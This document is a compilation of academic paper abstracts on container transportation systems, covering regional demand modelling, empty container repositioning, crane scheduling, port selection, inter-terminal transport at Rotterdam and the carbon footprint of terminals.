MODELING OF ASSESSMENT OF A REGION’S NEED FOR CONTAINER TRANSPORTATION

ABSTRACT The article is devoted to development of a model for substantiating a region’s need for containerization of cargo transportation. The model includes two interrelated elements: a method for substantiating container suitability for cargoes and an imitation algorithm for planning of the region’s need for containerization. The planning of the need for containerization links the demand of enterprises for transportation (taking into account the levels of product container suitability) and the available resources of the container transport system (terminals, container fleet, rolling stock). Further development of the model assumes assessment of costs and benefits of the region from development of the container system. Verification of the simulation model at the example of Sverdlovsk region demonstrates its efficiency and adequacy of reality. Research on optimization of multi stage yard crane scheduling based on genetic algorithm

Detention decisions for empty containers in the hinterland transportation system

In this paper, we study a hinterland empty container transportation system which consists of a sea container terminal and an inland container terminal. There are a hinterland container operator who is in charge of the hinterland container transportation and an ocean carrier who has an empty container depot at the sea container terminal. We utilize a two-stage game model to describe the ocean carrier’s decision about the container’s free detention time and the hinterland container operator’s decision about the time when should an arrived empty container at the inland terminal be dispatched to the sea terminal. Optimal delivery policy of the empty container and the ocean carrier’s optimal free detention time are derived. It is shown that the decentralized system does not guarantee system coordination all the time. The ocean carrier has incentive to integrate the hinterland transportation operation only if the hinterland area is not very short of empty containers.

Research on coordinated scheduling of multiple systems and single jobs based on improved particle swarm optimization

This article has carried on the research from the different aspect and the application angle separately: firstly, multi system for unloading the single operation coordination scheduling problem, in order to improve the efficiency of container handling equipment, reduce the waiting time of the container class column, the key equipment of different types (yard crane, container truck, internal to the hair line Longmen crane) work plan and consider the coordination of scheduling, considering the control the mutual influence between different handling equipment, build a multi system operation coordination scheduling model, the optimization results obtained through calculation by using the improved particle swarm algorithm; secondly, the dual task coordinated scheduling problem of multi system for unloading and loading operations, in the work cycle range, considering the hair line gantry crane and yard crane loading and unloading order, internal container truck transport order, we constructed a multi system coordination operation The mathematical model of scheduling is used to realize the optimization of multiple systems. The improved particle swarm algorithm is used to obtain the optimization results through an example, and the relevant conclusions are obtained by analysis.

Estimation of container system development in a region

A relevant problem of scientific research is formalization of the processes of interaction between transportation systems and the region in the context of modern ideas of synergetic approach. The purpose of this article is to develop a methodology for assessing and forecasting the needs of a region for container transport system development. The methodology includes two elements. First is the model for forecasting region's demand for container transportation based on the methods of correlation-regression analysis, index prediction and the Monte Carlo method. Second is the imitation model for assessing the needs of the region in the technical and organizational development of the container system. Organizational development is achieved due to system integration of market players, coordinated management of container flows, which makes it possible to establish the synergistic effect availability.

Prerequisites for the Creation of a High-Speed Container Transport System

The new scope of application for vehicles equipped with magnetic suspension is the fright container transportation. In order to realise the transit potential of the country, the increase in mean speed of the container trains is required. Objective. The purpose of the work is to explore the possibilities to develop the highspeed transport system equipped with magnetic suspension for container transportation along Eurasian land bridge. Methods. The following methods and analysis have been used as research instruments: case study, computer modeling, transport geography and technical and economic analysis. Results. The market analysis results of the transit container transportation have shown that the major challenge for Russian transit development is the constrained traffic capacity of the existing transport corridors. The drastic solution of the problem can be the construction of a new high-speed transport system. The following factors determining the conditions for the creation of the new transport system have been identified: the use of the Azov-Black sea basin transportation facilities, provision of the accessibility of the northern areas; the development of technical solutions ensuring the design of the transport system with low cost infrastructure. The combined traction levitation system has been developed based on the extremely simple design of the linear switched reluctance motor. The experimental researches of the full-functional physical model of the transport platform have been performed. The assessment of investment project efficiency has shown that despite large start-up investment in the track infrastructure, the project has positive economic effect. Practical importance. The computer model of the combined traction levitation system based on the linear switched reluctance motor has been designed. The concept of the new transport system construction has been introduced taking into account the characteristics of the supposed operating test sites in poorly developed areas. The high-speed route has been proposed connecting the Azov-Black sea basin with the Pacific coastline and completely passing through the territories of Russia including some northern regions. The transit potential assessment has shown that due to the transit time reduction it is possible to attract the container freights with traffic volume of 1.52 million in twenty-pounds equivalent.

An optimization model for container inventory management

This paper formulates the empty container repositioning (ECR) problem, which is one of the most important issues in the container shipping industry, by running a model to generate the service route of feeder shipping in a dynamic environment. The objective is to reduce the disequilibrium of laden and empty containers. This paper first provides a literature review with the emphasis on the shipping scheduling and modelling of ECR. Second, a network model has been designed to find the optimum size of ship servicing a particular region. A simply ECR policy is tested to demonstrate an essential impact on the profit of a container transport system. With the aid of this heuristic shipping model, ECR is integrated with the tramp ship routing problem under dynamic condition.

[For the English abstract and full text of the article please see the attached PDF-File (English version follows Russian version)].ABSTRACT The task is considered based on the long-term planning of development of a container transport system (CTS) as a part of a transport complex and associated with rational placement of the terminal infrastructure with respect to the areas of industrial production and consumption of container-compatible products. A methodological approach to clustering of objects of the terminal and logistics infrastructure was developed to create conditions for the mass use of container trains on the railway network. The enterprises are divided into clusters with geometric centers, where stations and container points are located. Collaborative solutions for inter terminal transport

Major ports contain multiple container terminals, sea terminals, train, truck and barge terminal, and empty container depots, operated by different companies. Port authorities try to streamline inter terminal container transport (ITT) within congested port areas by offering expensive common road and rail infrastructure. Alternatively, individual stakeholders can set up private or collaborative container transport systems. This paper develops a framework to analyse and determine feasibility conditions of a common ITT system in a port area, depending on total transport volumes. First, we develop a simulation model to evaluate the costs of transporting containers using different modes of transport including trucks, automated guided vehicles, and multi trailer systems. Next, the required number of vehicles per mode is determined for a given throughput and waiting time. The results of the simulation are used in a game-theoretic setting to determine the cost savings per stakeholder operating in a coalition. By comparing cost savings for all possible coalitions, it is possible to determine, for each stakeholder, the attractiveness of using a common system. We find the coalitions that result in the highest savings and compare them with the infrastructure cost required to realise them. We apply the method to determine the feasibility of a common ITT system for terminals in the Port of Rotterdam and show that it only pays off in case of high demand for container transports.

Performance Improvement through a Marshaling Yard Storage Area in a Container Port Using Optimization via Simulation Technique (Case Study at Shahid Rajaee Container Port)

Container ports have faced increasing development for the last 10 years. In such systems, the container transportation system has the most important effect on the total system. Therefore, there is a continuous need for the optimal use of equipment and facilities in the ports. Regarding to the several complicated structure and activities in container ports, this paper evaluates and compares two different storage strategies for storing containers in the yard. To do so and in order to cover all actual stochastic events occurring in the system, a simulation model of the real system was developed by using loading and unloading norms as important criteria to evaluate the performance of Shahid Rajaee container port. By replicating of the simulation model and considering the two strategies, it was shown that using a marshalling yard policy has a significant effect on the performance level of the port which leads to cost reductions.

ANALYSIS OF THE PROSPECTS DEVELOPMENT CONTAINER MARKET IN UKRAINE

Goal. The signing of an association agreement between Ukraine and the European Union requires that the first comprehensive development in all fields and meet the high European standards. One important area is the development of the transport system of the country as a whole and for individual modes of transport. The favorable geographical position of Ukraine, its position as a transit country between east and west, and the rapid development of container transport requires appropriate measures to keep the achieved position in the container shipping market and further increases in freight flows. The aim of the article is the analysis of the container transport system, determine the prospects for further development, the establishment of problem areas and suggest ways to address them. Statement of the basic material. The volume of container traffic around the world in recent decades shows a stable growth trend, which slightly affected even such events as the global financial crisis of 2008. In the past five years, this growth is mainly due to the active development of the economies of China and other countries in Southeast Asia, as well as because of the outsourcing of production in the same region. In this regard, many countries are increasingly focusing on building a reliable transport bridge between East and West, including the development of container transport system. Ukraine is one of the leading positions in the processing of container traffic in the Black Sea region, but for various reasons in recent years the volume of its decline. To remedy this situation it is necessary improvement of the whole spectrum of operations, the organization of container traffic flow, which in turn requires research to identify issues and develop solutions. A scenario discovery study of the impact of uncertainties in the global container transport system on European ports

The global container transport system is changing quickly. Ports can be severely affected by these changes; therefore, ports need insight into how the system might change and what the impact of this will be on their competitive position. Given the intrinsic complexity of the container transport system and the presence of a wide range of deeply uncertain factors affecting the system, we use an exploratory modeling approach to study future scenarios for the global container network. Using scenario discovery and worst-case discovery, we assess the implications of various uncertain factors on the competitive position of the port of Rotterdam. It is found that overall the competitive position of Rotterdam is quite robust with respect to the various uncertain factors. The main vulnerability is the quality of the hinterland connections. A modest deterioration of the quality of the hinterland connections, resulting in increased travel time, will result in a loss of throughput for Rotterdam.

Equilibrium models in multimodal container transport systems

Optimizing the performance of multimodal freight transport networks involves adequately balancing the interplay between costs, volumes, times of departure and arrival, and times of travel. In order to study this interplay, we propose an assignment model that is able to efficiently determine flows and costs in a multimodal network. The model is based on a so-called user equilibrium principle, which is at the basis of Dynamic Traffic Assignment problems. This principle takes into account transport demands to be shipped using vehicles that transport single freight units (such as trucks) or multiple freight units (such as trains and barges, where demand should be bundled to reach efficient operations). Given a particular demand, the proposed model provides an assignment of the demand over the available modes of transport. The outcome of the model, i.e., the equilibrium point, minimizes users’ generalized costs, expressed as a function of mode, travel time and related congestion, and waiting time for bundling sufficient demand in order to fill a vehicle. The model deals with these issues across a doubly-dynamic time scale and in an integrated manner. One dynamic involves a learning dynamic converging towards an equilibrium (day-to-day) situation, reflecting the reaction of the players towards the action of the others. Another dynamic considers the possible departure time that results in minimum expected costs, also due to the fact that players mutually influence each other on the choice of departure times, due to congestion effects and costs for early/late arrival of freight units. This is a choice within a given time horizon such as a day or a week. We present a study on the influence and sensitivity of different model parameters, in order to analyse the implications on strategic decisions, fostering a target modal share for freight transportation. We also study under which conditions the different modes can be substitutes for each other.

The container transport system: Selection criteria and business attractiveness for North-European ports

In the modern global business environment, port policymakers must continuously make an effort to understand what factors influence port users’ choice of port. This article identifies which factors affect port selection most strongly. It does so for three ports: Antwerp, Rotterdam and Hamburg – and three types of decision makers: shippers, carriers and freight forwarders. The Analytical Hierarchy Process method is applied to gauge port players’ prioritization of decision factors in port selection. Data are collected by means of two sets of questionnaire surveys. The prioritized criteria differ between the three mentioned respondent groups, which is attributed to their respective positions and responsibilities within the supply chain, and the contract of carriage concerned (carrier haulage or merchant haulage). The overall results yield the following ranking of port selection criteria in decreasing order of importance: port costs, geographical location, quality of hinterland connections, productivity and capacity. In respect of general port attractiveness, Antwerp is found to be the most attractive, followed by Rotterdam in second place, and Hamburg in third.

Research of Container Transport Organization Model Based on the Theory of Hub and Spoke

In order to realize scale economy of shipping and promote development of container transportation system of the Yangtze River, this paper established the model of transport organization based on theory of hub and spoke, and applied the model to container transportation system of the Yangtze River.The results show that if hub k is Wuhan Port, so the model can play the advantages of scale economy, reduce unit transportation costs and achieve the purpose of reducing the total cost and the social cost of logistics network.

LOJİSTİK SEKTÖRÜNÜN TÜRK EKONOMİSİNE KATKILARI VE BİR ARAŞTIRMA

In globalizing world which removed all the borders, and thus transportation of goods with minimum price is required. Up to the present, there has not been found any solution instead of transportation. Turkey, as one of the world countries, giving preference transportation (passenger or cargo) by road has increased the cost of logistic sector. The being 95 % of road transportation in all transportation systems and not to care about other ways of transportation has caused much loss of life and property every year. The importance of logistic industry in recent years has begun to be noticed and tried to be renewed by many people. In this study, improving logistic sector and logistics management in Turkey and outsourcing were overemphasized. So, failures were analysed and looked for any way to solve problems. In actuality, to bring down the cost and compete with other companies, we have to get under control the transportation and discipline it. Also, it shouldn't be forgotten that outsourcing will cause competitive advantage in transportation sector. The service quality of outsourcing depends on the expertise of the instution. In addition, container transportation system which has made progress since the 1980s has become very significant. Container transportation that is from a port to port raised the importance of harbours more. Container transportation system has led to the emergence of the concept of ''terminal''. Thanks to container terminals, logistic services have become economic, efficient and more secure. Especially in our country, as a result of privatization, a large part of ports have been transferred to private companies and these companies have made necessary studies for bottom structure of their ports and pave the way for working properly. And this can be a good model as a development of logistic sector in our country.

Study on Carbon Footprint of Container Transportation System

As an important hub of logistic chain, seaport is a major energy consumer. Therefore, the carbon footprint of container transportation system is studied in the paper. First, the operation process of container transportation system is analyzed. Second, the carbon footprint quantitative method is introduced. Finally, a case study is given as an example. Results indicate that carbon emission of quayside cranes accounts for the largest proportion in the transportation system. So, it's necessary to reduce the carbon emission of quayside crane.
